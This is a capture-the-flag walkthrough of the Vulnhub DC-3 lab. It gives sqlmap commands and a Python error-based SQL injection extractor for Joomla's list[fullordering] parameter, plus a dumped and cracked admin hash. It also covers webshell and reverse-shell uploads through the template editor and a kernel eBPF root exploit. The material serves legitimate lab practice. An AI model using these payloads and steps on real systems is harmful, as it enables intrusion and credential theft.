Vulnhub DC-3 target machine: complete walkthrough

A few words first:
Everything up to the privilege escalation was done a month ago. I ran into a problem with the escalation at the time and shelved it; it was only finished today, so the target's IP address may have changed between the two sessions.
Note: the IP address that appears later, 192.168.200.55, is also the target's address (the commands below still show 192.168.200.8 from the earlier session). If this article is of any help to you, I would be honored.

1. Set up the environment

1. Tools

Attacking machine: Kali (192.168.200.14)
Target machine: DC-3 (IP address unknown at this point)

2. Notes

The attacking machine and the target machine must use the same network connection mode. DC-3 is set to NAT mode here, the same as Kali (bridged mode also works, as long as both machines match).

DC-3 network settings
After clicking Advanced in the VM's network settings you can see the target machine's MAC address, which makes it easy to pick the target out when scanning for IP addresses.

2. Information gathering

1. Find live hosts on the same subnet

Note the MAC address of the DC-3 target machine and match it against the scan output to determine the target's IP address. Any of the following three methods works:

Method one:

arp-scan -l

Method two:

nmap -sP 192.168.200.0/24 -T4
#-sP is a ping sweep with no port scan (the same as -sn on current nmap versions)

Method three:

netdiscover

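The MAC-to-IP matching above is done by eye from the screenshots. As an added example (not part of the original write-up), the Python below parses the output of arp-scan and of the nmap ping sweep and returns the IP whose MAC matches, normalising the 00-0C-29-... and 00:0c:29:... spellings so a MAC copied from the VM settings compares equal to what the scanner prints. The scan output embedded in it is constructed sample data, not a capture from this lab.

```python
import re

# Constructed sample output in the format the two discovery tools print (not real scan results).
ARP_SCAN_OUTPUT = """\
Interface: eth0, type: EN10MB, MAC: 00:0c:29:aa:bb:cc, IPv4: 192.168.200.14
Starting arp-scan 1.9.7 with 256 hosts
192.168.200.1\t00:50:56:c0:00:08\tVMware, Inc.
192.168.200.2\t00:50:56:e1:22:33\tVMware, Inc.
192.168.200.8\t00:0c:29:12:34:56\tVMware, Inc.
192.168.200.254\t00:50:56:f9:88:77\tVMware, Inc.
"""

NMAP_SN_OUTPUT = """\
Starting Nmap 7.92 ( https://nmap.org )
Nmap scan report for 192.168.200.1
Host is up (0.00021s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.200.8
Host is up (0.00044s latency).
MAC Address: 00:0C:29:12:34:56 (VMware)
Nmap scan report for 192.168.200.14
Host is up.
"""

MAC_RE = re.compile(r"(?:[0-9a-f]{2}[:-]){5}[0-9a-f]{2}", re.I)
IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


def normalize_mac(mac):
    """Lower-case, colon-separated form so 00-0C-29-12-34-56 and 00:0c:29:12:34:56 compare equal."""
    return mac.replace("-", ":").lower()


def parse_arp_scan(text):
    """arp-scan prints one 'IP<tab>MAC<tab>vendor' line per discovered host; header lines are skipped."""
    hosts = {}
    for line in text.splitlines():
        parts = line.split("\t")
        if len(parts) >= 2 and IP_RE.fullmatch(parts[0]) and MAC_RE.fullmatch(parts[1]):
            hosts[normalize_mac(parts[1])] = parts[0]
    return hosts


def parse_nmap_sn(text):
    """nmap -sn prints 'Nmap scan report for IP' followed, for remote hosts, by a 'MAC Address:' line.
    The scanning host itself has no MAC line, so it is never returned."""
    hosts = {}
    current_ip = None
    for line in text.splitlines():
        if line.startswith("Nmap scan report for"):
            m = IP_RE.search(line)
            current_ip = m.group(1) if m else None
        elif line.startswith("MAC Address:") and current_ip:
            m = MAC_RE.search(line)
            if m:
                hosts[normalize_mac(m.group(0))] = current_ip
    return hosts


def find_ip_by_mac(text, mac):
    """Return the IP of the host whose MAC matches, from either tool's output, or None if absent."""
    hosts = parse_arp_scan(text)
    hosts.update(parse_nmap_sn(text))
    return hosts.get(normalize_mac(mac))


if __name__ == "__main__":
    # The MAC would be the one read from the target VM's Advanced network settings.
    print(find_ip_by_mac(ARP_SCAN_OUTPUT, "00-0C-29-12-34-56"))
```

Feed it the real output with `find_ip_by_mac(subprocess.check_output(["arp-scan", "-l"], text=True), mac)`; a `None` result means the target is not on the same subnet, which is exactly the NAT-versus-bridged mismatch warned about above.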
2. Scan target IP open ports

nmap -sV -p- 192.168.200.8
#-sV probes each open port for the service and version running on it
#-p- scans all ports 1-65535 (nmap's default is only the 1000 most common ports)

Only port 80 is open on the target, so the web application is the sole entry point.

3. Directory scanning

Scanning with dirsearch shows an administrator directory, which should be the admin back end.

4. Fingerprinting

Open the website in a browser: it is a well-known CMS.
The English text on the left reads:
This time, there is only one flag, one entry point and no clues. To get this flag you obviously have to gain root privileges. How you become root is up to you – and, obviously, the system. Good luck and I hope you enjoy this little challenge.

Scan with joomscan:

joomscan -u http://192.168.200.8/

Installing joomscan:

sudo apt-get install joomscan

joomscan reports the Joomla version. The general approach is to look up known vulnerabilities for that version; first confirm the back-end login page under the administrator directory. A web search turns up a SQL injection affecting this Joomla version, and searchsploit in Kali lists the same entry. Viewing that exploit file gives the injection point and a ready-made sqlmap command, which is used in the next section.

5. Dumping and cracking the admin credentials

Enumerate the databases with sqlmap. The injectable parameter is list[fullordering]; the payload is built from the sqlmap command given in the exploit file:

sqlmap -u "http://192.168.200.8/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p 'list[fullordering]'

List the tables in the joomladb database:

sqlmap -u "http://192.168.200.8/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p 'list[fullordering]'

The #__users table is found. List its columns:

sqlmap -u "http://192.168.200.8/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns -p 'list[fullordering]'

The columns that matter for logging in are username and password (id and name help identify the account). Dump them:

sqlmap -u "http://192.168.200.8/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbms mysql -D joomladb -T '#__users' -C id,name,password,username --dump
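sqlmap hides what the updatexml payload actually does. The following Python, added here as an illustration and not part of the original write-up or of sqlmap, shows the mechanics of error-based extraction through the list[fullordering] parameter of com_fields: MySQL's XPATH error message reveals at most 32 characters, so a 60-character bcrypt hash has to be read with SUBSTRING in 31-character pieces and reassembled. The exact payload shape, the fake_server stand-in and its FAKE_DB contents are constructed assumptions; against a real target you would replace fake_server with a function that performs the HTTP request and returns the response body.

```python
import re
from urllib.parse import urlencode, urlparse, parse_qs

# Base request as used with sqlmap above; list[fullordering] is the injectable parameter.
BASE_URL = "http://192.168.200.8/index.php"
BASE_PARAMS = {"option": "com_fields", "view": "fields", "layout": "modal"}

# MySQL shows at most 32 characters of the bad XPath expression in its error text:
# one is used for the '~' marker, leaving 31 characters of data per request.
CHUNK = 31
ERROR_RE = re.compile(r"XPATH syntax error: '~([^']*)'")


def build_payload(inner_query, start, length=CHUNK):
    """updatexml() expression that leaks a slice of inner_query's result via the error message.
    Assumption: the sort expression accepts a bare function call, as the exploit file's sqlmap command does."""
    return ("updatexml(0x23,concat(0x7e,(select substring(({q}),{s},{l}))),0x23)"
            .format(q=inner_query, s=start, l=length))


def build_url(inner_query, start):
    params = dict(BASE_PARAMS, **{"list[fullordering]": build_payload(inner_query, start)})
    return BASE_URL + "?" + urlencode(params)


def parse_leak(response_body):
    """Pull the leaked slice out of the MySQL error page, or None if no error text is present."""
    m = ERROR_RE.search(response_body)
    return m.group(1) if m else None


def extract_value(send, inner_query):
    """Read the complete result of inner_query one chunk at a time.
    `send` is a callable taking a URL and returning the response body as a string."""
    result = ""
    start = 1
    while True:
        piece = parse_leak(send(build_url(inner_query, start)))
        if not piece:            # no error, or an empty slice past the end of the value
            break
        result += piece
        if len(piece) < CHUNK:   # short slice means we reached the end
            break
        start += CHUNK
    return result


# ---- constructed stand-in for the vulnerable server, so this runs without a network ----
FAKE_DB = {
    "select password from #__users limit 0,1":
        "$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu",
    "select username from #__users limit 0,1": "admin",
}
SUBSTR_RE = re.compile(r"select substring\(\((.+?)\),(\d+),(\d+)\)")


def fake_server(url):
    """Emulates MySQL evaluating the payload and failing inside updatexml() with the 32-char XPATH error."""
    payload = parse_qs(urlparse(url).query).get("list[fullordering]", [""])[0]
    m = SUBSTR_RE.search(payload)
    if not m or m.group(1) not in FAKE_DB:
        return "<html>normal page</html>"
    value, start, length = FAKE_DB[m.group(1)], int(m.group(2)), int(m.group(3))
    chunk = value[start - 1:start - 1 + length]          # SUBSTRING is 1-based
    return "<html>XPATH syntax error: '{}'</html>".format(("~" + chunk)[:32])


if __name__ == "__main__":
    print(extract_value(fake_server, "select username from #__users limit 0,1"))
    print(extract_value(fake_server, "select password from #__users limit 0,1"))
```

The chunked loop is the reason sqlmap fires several requests per row when using the error-based technique; the 31-character limit also explains why a single hand-crafted updatexml request in the browser only ever shows the beginning of the hash.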

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu #bcrypt hash: $2y$ is the bcrypt identifier and 10 is the cost factor, so every guess costs 2^10 rounds

Crack it with John the Ripper in Kali:

vi admin.txt #paste the hash into the file
john admin.txt #crack it (john recognises the bcrypt format by itself)

The cracked password is snoopy and the account is admin.
Log in to the back end with these credentials.

3. Exploitation

Uploading a webshell

From the back end the site's template source can be viewed, and the PHP files of a template can be edited.
Use this editable-template feature to create test.php under the template directory and write a one-line PHP webshell into it; AntSword then connects to it successfully.

The webshell is served from the template directory path. Once AntSword is connected, the web root can be browsed and a virtual terminal opened.

The template directory is the path below; requesting it directly returns a listing of its contents, since directory listing is enabled on the server:

http://192.168.200.8/templates/beez3/html/

Reverse shell

Upload a reverse-shell file into the /templates/beez3 template directory the same way and note its path. The file is your own; in this write-up it is named shell.php. Request the file with a listener waiting on the attacking machine.

The reverse shell connects back successfully.

Using an exploit

Use searchsploit to look for privilege-escalation exploits for Ubuntu 16.04. Exploit-DB entry 39772 applies: a local privilege escalation for the 4.4 kernel via the eBPF double-fdput bug (CVE-2016-4557), not a denial-of-service bug.

searchsploit ubuntu 16.04

View the entry and copy it out:

cp /usr/share/exploitdb/exploits/linux/local/39772.txt shell.txt
cat shell.txt

The text file gives the URL of the exploit archive.

Download the archive (this step was done on the target machine; it was done incorrectly there).
Unpack it:

unzip 39772.zip #unzip the 39772.zip archive
cd 39772
tar -xvf exploit.tar #extract the exploit tarball
cd ebpf_mapfd_doubleput_exploit

Privilege escalation

Compile the exploit on the target (the build script needs gcc there):

./compile.sh #run the build script to compile the exploit

Run the exploit to get root:

./doubleput #run the privilege-escalation binary

Wait a moment; the exploit drops a root shell, and with root the flag can be read.

Article reference: https://blog.csdn.net/weixin_43583637/article/details/101554815